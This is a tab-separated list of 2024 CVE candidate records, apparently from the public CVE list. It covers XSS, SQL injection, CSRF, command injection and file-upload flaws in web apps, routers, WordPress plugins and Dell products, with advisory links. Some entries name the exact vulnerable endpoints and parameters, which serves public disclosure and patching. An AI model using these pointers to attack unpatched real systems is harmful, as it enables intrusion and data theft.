CVE    2024    22635    Candidate    WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php.    MISC:https://packetstormsecurity.com/files/176365/WebCalendar-1.3.0-Cross-Site-Scripting.html    Assigned (20240111)
CVE    2024    22628    Candidate    Budget and Expense Tracker System v1.0 is vulnerable to SQL Injection via /expense_budget/admin/?page=reports/budget&date_start=2023-12-28&date_end=    MISC:https://github.com/GaoZzr/CVE_report/blob/main/budget-and-expense-tracker-system/SQLi-1.md    Assigned (20240111)
CVE    2024    22627    Candidate    Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_distributor.php?id=.    MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-3.md    Assigned (20240111)
CVE    2024    22626    Candidate    Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_retailer.php?id=.    MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-2.md    Assigned (20240111)
CVE    2024    22625    Candidate    Complete Supplier Management System v1.0 is vulnerable to SQL Injection via /Supply_Management_System/admin/edit_category.php?id=.    MISC:https://github.com/GaoZzr/CVE_report/blob/main/Supply_Management_System/SQLi-1.md    Assigned (20240111)
CVE    2024    22603    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/links/add_link    MISC:https://github.com/ljw11e/cms/blob/main/4.md    Assigned (20240111)
CVE    2024    22601    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/scorerule_save    MISC:https://github.com/ljw11e/cms/blob/main/5.md    Assigned (20240111)
CVE    2024    22593    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/add_group_save    MISC:https://github.com/ysuzhangbin/cms2/blob/main/3.md    Assigned (20240111)
CVE    2024    22592    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_update    MISC:https://github.com/ysuzhangbin/cms2/blob/main/2.md    Assigned (20240111)
CVE    2024    22591    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/user/group_save.    MISC:https://github.com/ysuzhangbin/cms2/blob/main/1.md    Assigned (20240111)
CVE    2024    22570    Candidate    A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.    MISC:https://github.com/Num-Nine/CVE/issues/11    Assigned (20240111)
CVE    2024    22569    Candidate    Stored Cross-Site Scripting (XSS) vulnerability in POSCMS v4.6.2, allows attackers to execute arbitrary code via a crafted payload to /index.php?c=install&m=index&step=2&is_install_db=0.    MISC:https://github.com/Num-Nine/CVE/issues/12    Assigned (20240111)
CVE    2024    22568    Candidate    FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/del.    MISC:https://github.com/kayo-zjq/myc/blob/main/1.md    Assigned (20240111)
CVE    2024    22567    Candidate    File Upload vulnerability in MCMS 5.3.5 allows attackers to upload arbitrary files via crafted POST request to /ms/file/upload.do.    MISC:https://github.com/h3ak/MCMS-CVE-Request/    Assigned (20240111)
CVE    2024    22563    Candidate    openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.    MISC:https://github.com/openvswitch/ovs-issues/issues/315    Assigned (20240111)
CVE    2024    22562    Candidate    swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.    MISC:https://github.com/matthiaskramm/swftools/issues/210    Assigned (20240111)
CVE    2024    2256    Candidate    The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049746%40oik&new=3049746%40oik&sfp_email=&sfph_mail=   |   MISC:https://www.oik-plugins.com/shortcode_example/bw_contact_button-security-fix/   |   URL:https://www.oik-plugins.com/shortcode_example/bw_contact_button-security-fix/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1266c6df-214b-4b6b-8f1d-a67385469bf5?source=cve    Assigned (20240307)
CVE    2024    22559    Candidate    LightCMS v2.0 is vulnerable to Cross Site Scripting (XSS) in the Content Management - Articles field.    MISC:https://github.com/eddy8/LightCMS/issues/34    Assigned (20240111)
CVE    2024    22551    Candidate    WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search.    MISC:https://packetstormsecurity.com/files/176314/WhatACart-2.0.7-Cross-Site-Scripting.html    Assigned (20240111)
CVE    2024    22550    Candidate    An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file.    MISC:https://packetstormsecurity.com/files/176312/ShopSite-14.0-Cross-Site-Scripting.html    Assigned (20240111)
CVE    2024    2255    Candidate    The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 4.5.2 due to insufficient input sanitization and output escaping on user supplied attributes such as listStyle. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/essential-blocks/tags/4.5.2/blocks/TableOfContents.php#L120   |   URL:https://plugins.trac.wordpress.org/browser/essential-blocks/tags/4.5.2/blocks/TableOfContents.php#L120   |   MISC:https://plugins.trac.wordpress.org/changeset/3053199/essential-blocks/trunk/blocks/TableOfContents.php   |   URL:https://plugins.trac.wordpress.org/changeset/3053199/essential-blocks/trunk/blocks/TableOfContents.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cfcd59ae-085f-47d2-a4d2-2d1239f035d2?source=cve    Assigned (20240307)
CVE    2024    22549    Candidate    FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the email settings of the website settings section.    MISC:https://github.com/cccbbbttt/cms/blob/main/1.md    Assigned (20240111)
CVE    2024    22548    Candidate    FlyCms 1.0 is vulnerable to Cross Site Scripting (XSS) in the system website settings website name section.    MISC:https://github.com/5List/cms/blob/main/1.md    Assigned (20240111)
CVE    2024    22547    Candidate    WayOS IBR-7150 <17.06.23 is vulnerable to Cross Site Scripting (XSS).    MISC:https://github.com/WarmBrew/web_vul/blob/main/wayos/wayos.md    Assigned (20240111)
CVE    2024    22545    Candidate    An issue was discovered in TRENDnet TEW-824DRU version 1.04b01 that allows unauthenticated attackers to execute arbitrary code via the system.ntp.server parameter in the sub_420AE0() function. The attack can be launched remotely.    MISC:https://warp-desk-89d.notion.site/TEW-824DRU-e7228d462ce24fa1a9fecb0bee57caad    Assigned (20240111)
CVE    2024    22544    Candidate    An issue was discovered in Linksys Router E1700 version 1.0.04 (build 3) that allows authenticated attackers to execute arbitrary code via the setDateTime function.    MISC:https://mat4mee.notion.site/Remote-Code-Execution-RCE-on-the-Linksys-Router-E1700-765c9bbf6a7f4171b670bc778bf9b005    Assigned (20240111)
CVE    2024    22543    Candidate    An issue was discovered in Linksys Router E1700 1.0.04 (build 3) that allows authenticated attackers to escalate privileges via a crafted GET request to the /goform/* URI or via the ExportSettings function.    MISC:https://mat4mee.notion.site/Leaked-SessionID-can-lead-to-authentication-bypass-on-the-Linksys-Router-E1700-f56f9c4b15e7443fa237bd1b101a18d2    Assigned (20240111)
CVE    2024    22533    Candidate    Before Beetl v3.15.12, the rendering template has a server-side template injection (SSTI) vulnerability. When the incoming template is controllable, it will be filtered by the DefaultNativeSecurityManager blacklist. Because blacklist filtering is not strict, the blacklist can be bypassed, leading to arbitrary code execution.    MISC:https://gitee.com/xiandafu/beetl/issues/I8RU01    Assigned (20240111)
CVE    2024    22532    Candidate    Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file.    MISC:https://github.com/pwndorei/CVE-2024-22532    Assigned (20240111)
CVE    2024    22529    Candidate    TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.    MISC:https://github.com/unpWn4bL3/iot-security/blob/main/29.md    Assigned (20240111)
CVE    2024    22523    Candidate    Directory Traversal vulnerability in Qiyu iFair version 23.8_ad0 and before, allows remote attackers to obtain sensitive information via uploadimage component.    MISC:https://www.yuque.com/for82/vdzwqe/sc8ictw8poo8v5gl    Assigned (20240111)
CVE    2024    22520    Candidate    An issue discovered in Dronetag Drone Scanner 1.5.2 allows attackers to impersonate other drones via transmission of crafted data packets.    MISC:https://github.com/Drone-Lab/Dronetag-vulnerability    Assigned (20240111)
CVE    2024    2252    Candidate    The Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes such as URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/droit-elementor-addons/   |   URL:https://wordpress.org/plugins/droit-elementor-addons/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve    Assigned (20240307)
CVE    2024    22519    Candidate    An issue discovered in OpenDroneID OSM 3.5.1 allows attackers to impersonate other drones via transmission of crafted data packets.    MISC:https://github.com/Drone-Lab/opendroneid-vulnerability    Assigned (20240111)
CVE    2024    22515    Candidate    Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.    MISC:https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability    Assigned (20240111)
CVE    2024    22514    Candidate    An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.    MISC:https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution    Assigned (20240111)
CVE    2024    22513    Candidate    djangorestframework-simplejwt version 5.3.1 and before is vulnerable to information disclosure. A user can access web application resources even after their account has been disabled due to missing user validation checks via the for_user method.    MISC:https://github.com/dmdhrumilmistry/CVEs/tree/main/CVE-2024-22513    Assigned (20240111)
CVE    2024    22497    Candidate    Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL.    MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20admin-login-password)%20.md    Assigned (20240111)
CVE    2024    22496    Candidate    Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.    MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20admin-login-username)%20.md    Assigned (20240111)
CVE    2024    22494    Candidate    A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save mobile parameter, which allows remote attackers to inject arbitrary web script or HTML.    MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20moblie%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20moblie%20para.md    Assigned (20240111)
CVE    2024    22493    Candidate    A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.    MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20content%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20content%20para.md    Assigned (20240111)
CVE    2024    22492    Candidate    A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save contact parameter, which allows remote attackers to inject arbitrary web script or HTML.    MISC:https://github.com/cui2shark/security/blob/main/(JFinalcms%20contact%20para)A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20Jfinalcms%20contact%20para.md    Assigned (20240111)
CVE    2024    22491    Candidate    A Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter.    MISC:https://github.com/cui2shark/security/blob/main/A%20stored%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20beetl-bbs%20post%20save.md    Assigned (20240111)
CVE    2024    22490    Candidate    Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.    MISC:https://github.com/cui2shark/security/blob/main/beetl-bbs%20-%20A%20reflected%20cross-site%20scripting%20(XSS)%20vulnerability%20was%20discovered%20in%20the%20search%20box.md    Assigned (20240111)
CVE    2024    2249    Candidate    The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input sanitization and output escaping the user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3050316/lastudio-element-kit/trunk/includes/extensions/elementor/wrapper-link.php   |   URL:https://plugins.trac.wordpress.org/changeset/3050316/lastudio-element-kit/trunk/includes/extensions/elementor/wrapper-link.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve    Assigned (20240307)
CVE    2024    22475    Candidate    Cross-site request forgery vulnerability in multiple printers and scanners which implement Web Based Management provided by BROTHER INDUSTRIES, LTD. allows a remote unauthenticated attacker to perform unintended operations on the affected product. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References].    MISC:https://jvn.jp/en/jp/JVN82749078/   |   URL:https://jvn.jp/en/jp/JVN82749078/   |   MISC:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000   |   URL:https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faqp00100601_000   |   MISC:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000   |   URL:https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faq00100823_000   |   MISC:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html   |   URL:https://www.fujifilm.com/fbglobal/eng/company/news/notice/2024/0306_2_announce.html   |   MISC:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002   |   URL:https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2024-000002   |   MISC:https://www.toshibatec.com/information/20240306_01.html   |   URL:https://www.toshibatec.com/information/20240306_01.html    Assigned (20240209)
CVE    2024    22473    Candidate    TRNG is used before initialization by ECDSA signing driver when exiting EM2/EM3 on Virtual Secure Vault (VSE) devices. This defect may allow Signature Spoofing by Key Recreation. This issue affects Gecko SDK through v4.4.0.    MISC:https://community.silabs.com/068Vm000001FrjT   |   URL:https://community.silabs.com/068Vm000001FrjT    Assigned (20240110)
CVE    2024    2247    Candidate    JFrog Artifactory versions below 7.77.7, 7.82.1, are vulnerable to DOM-based cross-site scripting due to improper handling of the import override mechanism.    MISC:https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories   |   URL:https://jfrog.com/help/r/jfrog-release-information/jfrog-security-advisories    Assigned (20240307)
CVE    2024    22464    Candidate    Dell EMC AppSync, versions from 4.2.0.0 to 4.6.0.0 including all Service Pack releases, contain an exposure of sensitive information vulnerability in AppSync server logs. A high privileged remote attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable system with privileges of the compromised account.    MISC:https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221932/dsa-2024-072-security-update-for-dell-emc-appsync-for-vulnerabilities    Assigned (20240110)
CVE    2024    22463    Candidate    Dell PowerScale OneFS 8.2.x through 9.6.0.x contains a use of a broken or risky cryptographic algorithm vulnerability. A remote unprivileged attacker could potentially exploit this vulnerability, leading to compromise of confidentiality and integrity of sensitive information    MISC:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222691/dsa-2024-062-security-update-for-dell-powerscale-onefs-for-proprietary-code-vulnerabilities    Assigned (20240110)
CVE    2024    22459    Candidate    Dell ECS, versions 3.6 through 3.6.2.5, and 3.7 through 3.7.0.6, and 3.8 through 3.8.0.4 versions, contain an improper access control vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to unauthorized access to all buckets and their data within a namespace    MISC:https://www.dell.com/support/kbdoc/en-us/000222470/dsa-2024-078-security-update-for-dell-ecs-access-control-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000222470/dsa-2024-078-security-update-for-dell-ecs-access-control-vulnerability    Assigned (20240110)
CVE    2024    22458    Candidate    Dell Secure Connect Gateway, 5.18, contains an Inadequate Encryption Strength Vulnerability. An unauthenticated network attacker could potentially exploit this vulnerability, allowing an attacker to recover plaintext from a block of ciphertext.    MISC:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities    Assigned (20240110)
CVE    2024    22457    Candidate    Dell Secure Connect Gateway 5.20 contains an improper authentication vulnerability during the SRS to SCG update path. A remote low privileged attacker could potentially exploit this vulnerability, leading to impersonation of the server through presenting a fake self-signed certificate and communicating with the remote server.    MISC:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222433/dsa-2024-076-security-update-for-dell-secure-connect-gateway-appliance-vulnerabilities    Assigned (20240110)
CVE    2024    22455    Candidate    Dell E-Lab Navigator, [3.1.9, 3.2.0], contains an Insecure Direct Object Reference Vulnerability in Feedback submission. An attacker could potentially exploit this vulnerability, to manipulate the email's appearance, potentially deceiving recipients and causing reputational and security risks.    MISC:https://www.dell.com/support/kbdoc/en-us/000222015/dsa-2024-073-security-update-for-mobility-e-lab-navigator-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222015/dsa-2024-073-security-update-for-mobility-e-lab-navigator-vulnerabilities    Assigned (20240110)
CVE    2024    22454    Candidate    Dell PowerProtect Data Manager, version 19.15 and prior versions, contain a weak password recovery mechanism for forgotten passwords. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to unauthorized access to the application with privileges of the compromised account. The attacker could retrieve the reset password token without authorization and then perform the password change    MISC:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities    Assigned (20240110)
CVE    2024    22453    Candidate    Dell PowerEdge Server BIOS contains a heap-based buffer overflow vulnerability. A local high privileged attacker could potentially exploit this vulnerability to write to otherwise unauthorized memory.    MISC:https://www.dell.com/support/kbdoc/en-us/000223209/dsa-2024-105-security-update-for-dell-poweredge-server-bios-for-a-heap-based-buffer-overflow-vulnerability   |   URL:https://www.dell.com/support/kbdoc/en-us/000223209/dsa-2024-105-security-update-for-dell-poweredge-server-bios-for-a-heap-based-buffer-overflow-vulnerability    Assigned (20240110)
CVE    2024    22452    Candidate    Dell Display and Peripheral Manager for macOS prior to 1.3 contains an improper access control vulnerability. A low privilege user could potentially exploit this vulnerability by modifying files in the installation folder to execute arbitrary code, leading to privilege escalation.    MISC:https://www.dell.com/support/kbdoc/en-us/000221414/dsa-2024-056   |   URL:https://www.dell.com/support/kbdoc/en-us/000221414/dsa-2024-056    Assigned (20240110)
CVE    2024    2245    Candidate    Cross-Site Scripting vulnerability in moziloCMS version 2.0. By sending a POST request to the '/install.php' endpoint, a JavaScript payload could be executed in the 'username' parameter.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-mozilocms   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-mozilocms    Assigned (20240307)
CVE    2024    22449    Candidate    Dell PowerScale OneFS versions 9.0.0.x through 9.6.0.x contains a missing authentication for critical function vulnerability. A low privileged local malicious user could potentially exploit this vulnerability to gain elevated access.    MISC:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities    Assigned (20240110)
CVE    2024    22445    Candidate    Dell PowerProtect Data Manager, version 19.15 and prior versions, contain an OS command injection vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.    MISC:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities    Assigned (20240110)
CVE    2024    22433    Candidate    Dell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices.    MISC:https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities    Assigned (20240110)
CVE    2024    22432    Candidate    Networker 19.9 and all prior versions contain a Plain-text Password stored in a temporary config file during backup duration in NMDA MySQL Database backups. A user with low privilege access to the Networker Client system could potentially exploit this vulnerability, leading to the disclosure of configured MySQL Database user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application Database with privileges of the compromised account.    MISC:https://www.dell.com/support/kbdoc/en-us/000221474/dsa-2024-059-security-update-for-dell-networker-multiple-components-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221474/dsa-2024-059-security-update-for-dell-networker-multiple-components-vulnerabilities    Assigned (20240110)
CVE    2024    22430    Candidate    Dell PowerScale OneFS versions 8.2.x through 9.6.0.x contains an incorrect default permissions vulnerability. A local low privileges malicious user could potentially exploit this vulnerability, leading to denial of service.    MISC:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities    Assigned (20240110)
CVE    2024    22428    Candidate    Dell iDRAC Service Module, versions 5.2.0.0 and prior, contain an Incorrect Default Permissions vulnerability. It may allow a local unprivileged user to escalate privileges and execute arbitrary code on the affected system. Dell recommends customers upgrade at the earliest opportunity.    MISC:https://www.dell.com/support/kbdoc/en-us/000221129/dsa-2024-018-security-update-for-dell-idrac-service-module-for-weak-folder-permission-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000221129/dsa-2024-018-security-update-for-dell-idrac-service-module-for-weak-folder-permission-vulnerabilities    Assigned (20240110)
CVE    2024    22426    Candidate    Dell RecoverPoint for Virtual Machines 5.3.x contains an OS Command injection vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to the execution of arbitrary operating system commands in the context of the root user, resulting in a complete system compromise.    MISC:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities    Assigned (20240110)
CVE    2024    22425    Candidate    Dell RecoverPoint for Virtual Machines 5.3.x contains a brute force/dictionary attack vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability to launch a brute force attack or a dictionary attack against the RecoverPoint login form. This allows attackers to brute-force the password of valid users in an automated manner.    MISC:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities   |   URL:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities    Assigned (20240110)
CVE    2024    22424    Candidate    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/argoproj/argo-cd/issues/2496   |   URL:https://github.com/argoproj/argo-cd/issues/2496   |   MISC:https://github.com/argoproj/argo-cd/pull/16860   |   URL:https://github.com/argoproj/argo-cd/pull/16860   |   MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg   |   URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg    Assigned (20240110)
CVE    2024    22422    Candidate    AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow an attacker to crash the server, resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2   |   URL:https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2   |   MISC:https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q   |   URL:https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q    Assigned (20240110)
